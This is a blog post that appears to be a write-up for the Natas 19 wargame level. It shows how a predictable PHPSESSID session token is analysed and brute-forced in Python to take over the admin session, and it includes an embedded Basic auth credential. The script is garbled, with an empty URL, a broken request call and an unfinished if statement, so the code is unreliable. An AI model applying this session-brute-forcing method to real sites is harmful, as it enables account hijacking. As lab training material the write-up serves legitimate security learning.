Saturday, November 15, 2014

Natas 19

Natas 19 looks a lot like the 18th challenge, except it looks like they've made a small change to how they pick the Session ID values.

If no change was made to make the ID space larger, the token can still be brute-forced.

First, let's make a request:

We can see that they still use the same "PHPSESSID" cookie, but it does look like it's no longer a simple integer value like before:

Using BURP's Sequencer, you can look and see how much entropy is in the Session ID tokens assigned by the server:

(note: the PHPSESSID value in this picture is incorrect and from an older run)

After running it for a while, it looks like there's still only 6 bits of entropy! That should easily be brute-forceable.

Looking through the tokens, it looks like the last characters of the token are always constant and are padded in front with 0-3 values between "31" and "39".

With this in mind, I wrote a quick python script to brute force the token:

import itertools
import requests

character_space = [""] + map(str, range(31, 40))
constant_tail = "2d61646d696e"

for x in itertools.product(character_space, repeat=3):
    token = "".join(x) + constant_tail
    url = ""
    payload = {"username": "admin", "password": "admin"}
    headers = {"Cookie": "PHPSESSID={0}".format(token), "Authorization": "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=="}

    print("trying {0}...".format(token))
    r =, params=payload, headers=headers)

    if "You are logged in as a regular user" in r.text:

After letting it run for a while, it eventually works!

No comments:

Post a Comment